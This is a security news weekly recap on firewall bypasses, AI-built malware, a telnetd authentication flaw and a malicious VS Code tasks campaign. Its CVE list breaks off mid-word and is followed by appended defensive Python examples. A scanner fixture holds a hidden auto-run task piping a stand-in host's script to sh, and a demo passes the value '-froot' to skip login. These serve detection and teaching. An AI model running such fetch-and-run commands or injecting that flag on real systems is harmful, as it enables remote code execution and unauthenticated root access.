The Hacker News
⚡ Weekly Recap: Firewall Flaws, AI-Built Malware, Browser Traps, Critical CVEs & More

This weekly recap highlights the increasing speed of attackers and the evolving nature of security failures, emphasizing the need for vigilance beyond simply patching vulnerabilities. It points to a trend where software continues to be a primary entry point for attacks, requiring a proactive approach to security.

Ravie Lakshmanan | Jan 26, 2026 | Hacking News / Cybersecurity

Security failures rarely arrive loudly. They slip in through trusted tools, half-fixed problems, and habits people stop questioning. This week's recap shows that pattern clearly. Attackers are moving faster than defenses, mixing old tricks with new paths. "Patched" no longer means safe, and every day, software keeps becoming the entry point. What follows is a set of small but telling signals: short updates that, together, show how quickly risk is shifting and why details can't be ignored.

⚡ Threat of the Week

Improperly Patched Flaw Exploited Again in Fortinet Firewalls — Fortinet confirmed that it's working to completely plug a FortiCloud SSO authentication bypass vulnerability following reports of fresh exploitation activity on fully patched firewalls. "We have identified a number of cases where the exploit was to a device that had been fully upgraded to the latest release at the time of the attack, which suggested a new attack path," the company said. The activity exploits an incomplete patch for CVE-2025-59718 and CVE-2025-59719, which could allow unauthenticated bypass of SSO login authentication via crafted SAML messages if the FortiCloud SSO feature is enabled on affected devices. In the absence of a fix, users are advised to restrict administrative access to edge network devices and turn off FortiCloud SSO logins by disabling the "admin-forticloud-sso-login" setting.

🔔 Top News

TikTok Forms New U.S. Entity to Avoid Federal Ban — TikTok officially announced that it formed a joint venture that will allow the hugely popular video-sharing application to continue operating in the U.S. The new venture, named TikTok USDS Joint Venture LLC, has been established in compliance with the Executive Order signed by U.S. President Donald Trump in September 2025, the platform said. The deal will see TikTok's Chinese parent company, ByteDance, sell the majority of its stake to a group of majority-American investors while retaining a 19.9% stake in the business. The Chinese government hasn't commented publicly on the agreement. The deal ends years of regulatory uncertainty that began in August 2020, when President Trump announced plans to ban the app, citing national security concerns.

VoidLink Generated Almost Entirely Using AI — VoidLink, the recently discovered malware that targets Linux-based cloud servers, was likely generated almost entirely by artificial intelligence (AI), signaling a significant evolution in the use of the technology to develop advanced malware. What alerted researchers to AI involvement in building VoidLink was a development plan that accompanied the project and was accidentally left exposed by its author. The developer also used regular checkpoints to ensure that the model was developing as instructed and that the code worked. The result was malware that the researchers who first detailed VoidLink described as "sophisticated, modern and feature-rich." The discovery is a watershed moment for malware development, underscoring a shift in how AI can be used to design advanced malicious programs. "The security community has long anticipated that AI would be a force multiplier for malicious actors. Until now, however, the clearest evidence of AI-driven activity has largely surfaced in lower-sophistication operations, often tied to less experienced threat actors, and has not meaningfully raised the risk beyond regular attacks," Check Point said. "VoidLink shifts that baseline: its level of sophistication shows that when AI is in the hands of capable developers, it can materially amplify both the speed and the scale at which serious offensive capability can be produced." From a defensive point of view, the use of AI also complicates attribution, as the generated code removes many of the usual clues and makes it harder to determine who is really behind an attack.

Critical GNU InetUtils telnetd Flaw Detailed — A critical security flaw has been disclosed in the GNU InetUtils telnet daemon (telnetd) that went unnoticed for nearly 11 years. The vulnerability, tracked as CVE-2026-24061 (CVSS score: 9.8), affects all versions of GNU InetUtils from 1.9.3 up to and including 2.7; it was introduced by a code change in March 2015. The flaw allows an attacker to establish a Telnet session without providing valid credentials, granting unauthorized access to the target system. SafeBreach Labs, in a root cause analysis of CVE-2026-24061, described it as easy to exploit: an attacker can supply a "-f" flag to the "/usr/bin/login" executable, effectively skipping interactive authentication and obtaining a root shell. SafeBreach has also released a public proof-of-concept (PoC) exploit for the flaw.

Vishing Attacks Target Identity Providers — Threat actors who specialize in voice phishing (aka vishing) have started using bespoke phishing kits that can intercept targets' login credentials while also allowing attackers to control the authentication flow in a targeted user's browser in real time. "Where threat actors could once pay for access to a kit with basic features that targeted all popular Identity Providers (Google, Microsoft Entra, Okta, etc.) and cryptocurrency platforms, a new generation of fraudsters are attempting to sell access to bespoke panels for each targeted service," Okta said. The ShinyHunters extortion gang has claimed responsibility for some of the attacks, Bleeping Computer reported.

CrashFix Crashes Browsers to Deliver Malware — A malvertising campaign is using a fake ad-blocking Chrome and Edge extension named NexShield that intentionally crashes the browser as a precursor to ClickFix attacks. Unlike typical ClickFix schemes that use non-existent security alerts or CAPTCHAs to lure users into executing malicious commands, the new CrashFix variant uses a malicious extension that first intentionally crashes the victim's browser and then delivers a fraudulent fix. When the browser is restarted, the extension displays a deceptive pop-up that shows a fake warning and suggests scanning the system to identify the problem. Doing so opens a new window with a bogus warning about detected security issues, along with instructions on how to fix the problem, which involve executing malicious commands in the Windows Run prompt, in typical ClickFix fashion. While the extension has since been removed, the attacks are designed to deliver a new Python-based remote access tool called ModeloRAT. The findings show that browser extensions are a high-risk attack vector for enterprises, allowing threat actors to bypass traditional security controls and gain a foothold on corporate endpoints.

Contagious Interview Evolves to Deliver Backdoor via VS Code — The North Korean threat actors behind the Contagious Interview campaign are employing a new mechanism that uses Microsoft Visual Studio Code (VS Code) to deliver a previously unseen backdoor that enables remote code execution on developer systems. The attack chain starts when targets are asked to clone and open malicious repositories hosted on GitHub, GitLab, or Bitbucket, typically framed as part of a technical assignment or code review exercise related to the hiring process. "The most important facilitator for this attack vector is the configuration's runOptions property, which supports a runOn value of folderOpen, causing the defined task to execute automatically when a workspace is opened," Abstract Security said. "Contagious Interview actors exploit this by including malicious shell commands in tasks.json files. When a victim clones a repository to their local machine and opens it in VS Code, the malicious task executes and kicks off the infection chain leading to malware installation." The malicious payloads are mostly hosted on Vercel domains, but other domains like vscodeconfig[.]com and vscode-load.onrender[.]com have also been identified. In at least one case, the "tasks.json" file is used to install a malicious npm package named "jsonwebauth." Contagious Interview has been active since 2022, primarily targeting software developers and IT professionals, especially in the blockchain and cryptocurrency sectors. As many as 3,136 individual IP addresses linked to likely targets of the Contagious Interview activity were identified between August 2024 and September 2025, most of them concentrated in South Asia and North America.

🔥 Trending CVEs

Hackers act fast. They can use new bugs within hours. One missed update can cause a big breach. Here are this week's most serious security flaws. Check them, fix what matters first, and stay protected.

This week's list includes — CVE-2026-24061 (GNU InetUtils telnetd), CVE-2026-23760 (SmarterMail), CVE-2026-20045 (Cisco Unified Communications and Webex Calling Dedicated Instance), CVE-2026-22218, CVE-2026-22219 (Chainlit), CVE-2026-1245 (binary-parser), CVE-2025-68143, CVE-2025-68144, CVE-2025-68145 (Anthropic mcp-server-git), CVE-2026-22844 (Zoom), CVE-2025-13927, CVE-2025-13928, CVE-2026-0723 (GitLab CE/EE), CVE-2026-0629 (TP-Link), CVE-2025-49758 (Microsoft SQL Server), CVE-2025-47179 (Microsoft Configuration Manager), CVE-2025-60021 (Apache bRPC), CVE-2025-61937, CVE-2025-64691, CVE-2025-61943, CVE-2025-65118 (AVEVA Process Optimization), CVE-2025-14369 (dr_flac), CVE-2026-0828 (Safetica ProcessMonitorDriver.sys), CVE-2026-0685 (Genshi template engine), CVE-2025-68675 (Apache Airflow), CVE-2025-14533 (Ad
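For the Fortinet item above, the interim mitigation is a single setting, and the quickest way to find which firewalls still have it on is to read their configuration backups offline. The following script is an added example written for this recap, not Fortinet's own tooling. It assumes the setting is stored under "config system global" as "set admin-forticloud-sso-login enable|disable"; when the line is absent the firmware default applies, and the script reports "unknown" rather than guessing that default. The backup excerpt it parses is constructed, not a real device dump.

```python
"""
Offline audit of a FortiOS configuration backup for the interim mitigation
named in the Fortinet item: the "admin-forticloud-sso-login" setting.

Added example for this recap; it is not Fortinet code. Assumptions: the
setting is written under "config system global" as
"set admin-forticloud-sso-login enable|disable"; when the line is absent
the firmware default applies and this script reports "unknown" instead of
guessing it. The sample backup below is constructed, not a real device dump.
"""
import re

SETTING = re.compile(r"^set admin-forticloud-sso-login (enable|disable)$")

# Constructed sample: a backup excerpt with the risky setting left enabled.
SAMPLE_CONFIG = """\
# constructed sample, not a real backup
config system global
    set admin-sport 8443
    set admin-forticloud-sso-login enable
    set hostname "edge-fw-01"
end
config system admin
    edit "admin"
        set trusthost1 10.0.0.0 255.255.255.0
    next
end
"""


def forticloud_sso_state(config_text: str) -> str:
    """Return "enable", "disable" or "unknown" for admin-forticloud-sso-login.

    FortiOS backups are nested "config ... / end" blocks, so the parser tracks
    nesting depth and only reads "set" lines that belong directly to
    "config system global".
    """
    in_global = False
    depth = 0
    for raw in config_text.splitlines():
        line = raw.strip()
        if not in_global:
            if line == "config system global":
                in_global, depth = True, 0
            continue
        if line.startswith("config "):
            depth += 1                      # a sub-block inside system global
        elif line == "end":
            if depth == 0:
                in_global = False           # left "config system global"
            else:
                depth -= 1
        elif depth == 0:
            m = SETTING.match(line)
            if m:
                return m.group(1)
    return "unknown"


def needs_mitigation(config_text: str) -> bool:
    """True when FortiCloud SSO admin login is explicitly enabled, i.e. the
    device stays exposed to the bypass described in the recap until Fortinet
    ships a complete fix."""
    return forticloud_sso_state(config_text) == "enable"


if __name__ == "__main__":
    state = forticloud_sso_state(SAMPLE_CONFIG)
    print(f"admin-forticloud-sso-login: {state}")
    if needs_mitigation(SAMPLE_CONFIG):
        # Assumed CLI shape for the mitigation named in the advisory text.
        print("apply: config system global / "
              "set admin-forticloud-sso-login disable / end")
```

Feed it the text of a full configuration export per device; an "unknown" result means the default is in force and must be confirmed on the device itself, since the default is not stated in the recap.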
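The telnetd item above describes a classic argument-injection bug: a value the client controls ends up in the argv that the daemon hands to /usr/bin/login, where a leading "-" makes it an option instead of a name. The following is an added example that models that pattern; it is not GNU InetUtils code and does not run any real login binary. Because the recap does not give the daemon's exact argv, the example assumes the client-controlled value is the login name and that login(1) accepts "-p", "-h HOST" and "-f USER", where "-f" means the caller vouches that USER is already authenticated. The hardening shown is one reasonable fix for this class, not SafeBreach's or the project's actual patch.

```python
"""
Argument-injection pattern behind the telnetd item: a client-supplied login
name becomes login's "-f" (pre-authenticated) flag. Added example, not GNU
InetUtils code; assumed option model for login(1) described in the lead-in.
"""
import getopt
import re
from typing import Optional

LOGIN = "/usr/bin/login"
LOGIN_OPTSTRING = "pf:h:"          # assumed: -p, -h HOST, -f USER (skip password)
VALID_USER = re.compile(r"[a-z_][a-z0-9_-]{0,31}")   # conservative login-name form


def telnetd_login_argv(user: str, host: str) -> list:
    """Vulnerable: the client-supplied name lands where login still parses
    options, so a name beginning with "-" is read as a flag."""
    return [LOGIN, "-p", "-h", host, user]


def telnetd_login_argv_hardened(user: str, host: str) -> list:
    """Hardened: refuse anything getopt could treat as an option (a leading
    "-") and anything outside a conservative login-name alphabet."""
    if not VALID_USER.fullmatch(user):
        raise ValueError(f"refusing client-supplied login name {user!r}")
    return [LOGIN, "-p", "-h", host, user]


def simulate_login(argv: list) -> tuple:
    """Parse argv as a getopt-based login would; return (user, skipped_password).

    With "-f", login trusts that USER was already authenticated and drops
    straight into a shell for that account without prompting.
    """
    opts, positional = getopt.getopt(argv[1:], LOGIN_OPTSTRING)
    opts = dict(opts)
    if "-f" in opts:
        return opts["-f"], True
    user: Optional[str] = positional[0] if positional else None
    return user, False


if __name__ == "__main__":
    for name in ("alice", "-froot"):
        argv = telnetd_login_argv(name, "198.51.100.7")
        print(f"{name!r:10} vulnerable builder -> login sees {simulate_login(argv)}")
        try:
            telnetd_login_argv_hardened(name, "198.51.100.7")
            print(f"{name!r:10} hardened builder   -> accepted")
        except ValueError as exc:
            print(f"{name!r:10} hardened builder   -> {exc}")
```

The legitimate name "alice" reaches login as a positional argument and gets a password prompt; the name "-froot" is consumed by getopt as "-f root" and login believes authentication already happened. The hardened builder rejects the second case before login is ever executed, which is the property to check for in any daemon that execs a setuid helper with network-supplied strings.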
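The Contagious Interview item turns on one VS Code feature: a tasks.json task with runOptions.runOn set to folderOpen runs the moment the cloned repository is opened. The scanner below is an added example for this recap, not Abstract Security's tooling. It assumes tasks are declared in a file named tasks.json under the VS Code 2.0.0 task schema (a "tasks" array whose entries may carry "runOptions"), and it accepts JSON-with-comments, which VS Code tolerates and plain json.loads does not. The sample file is constructed; the host payload.invalid is a placeholder, not one of the domains named in the report.

```python
"""
Scanner for the VS Code auto-run trick in the Contagious Interview item:
a tasks.json task whose runOptions.runOn is "folderOpen" executes as soon
as the cloned repository is opened. Added example; assumptions and the
constructed sample are described in the lead-in and comments.
"""
import json
import os
import re

# Constructed tasks.json: one ordinary build task and one that runs a
# shell pipeline on folderOpen with its terminal hidden. Placeholder host.
SAMPLE_TASKS_JSON = r'''{
  // Comments and trailing commas are legal in VS Code's JSONC files.
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
    },
    {
      "label": "prepare workspace",
      "type": "shell",
      "command": "curl -s https://payload.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }
    }
  ]
}'''


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments outside string literals, then trailing
    commas, so that URLs such as "https://..." inside strings survive."""
    out = []
    i, n = 0, len(text)
    in_str = False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep the escaped char verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j < 0 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j < 0 else j + 2
        else:
            out.append(c)
            i += 1
    # Trailing-comma cleanup; a ",}" inside a string would also match, which
    # is acceptable for a scanner that only needs the structure.
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def auto_run_tasks(tasks_json_text: str) -> list:
    """Return every task that VS Code would start on folderOpen."""
    doc = json.loads(strip_jsonc(tasks_json_text))
    hits = []
    for task in doc.get("tasks", []):
        run_on = (task.get("runOptions") or {}).get("runOn")
        if run_on == "folderOpen":
            hits.append({
                "label": task.get("label"),
                "type": task.get("type"),
                "command": task.get("command"),
                "args": task.get("args", []),
                # reveal: never keeps the terminal closed so the victim sees nothing
                "hidden": (task.get("presentation") or {}).get("reveal") == "never",
            })
    return hits


def scan_repo(root: str) -> dict:
    """Walk a checkout and map each tasks.json path to its auto-run tasks.
    Run this before opening an unfamiliar repository in VS Code."""
    findings = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        if "tasks.json" in filenames:
            path = os.path.join(dirpath, "tasks.json")
            with open(path, encoding="utf-8-sig") as fh:
                hits = auto_run_tasks(fh.read())
            if hits:
                findings[path] = hits
    return findings


if __name__ == "__main__":
    for hit in auto_run_tasks(SAMPLE_TASKS_JSON):
        print("auto-run task:", hit)
```

Point scan_repo at the directory you were asked to clone before opening it in the editor; any hit is worth reading in full, and a hit whose terminal is hidden is the shape described in the report. Disabling automatic tasks in VS Code's settings for untrusted folders is the complementary control on the editor side.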
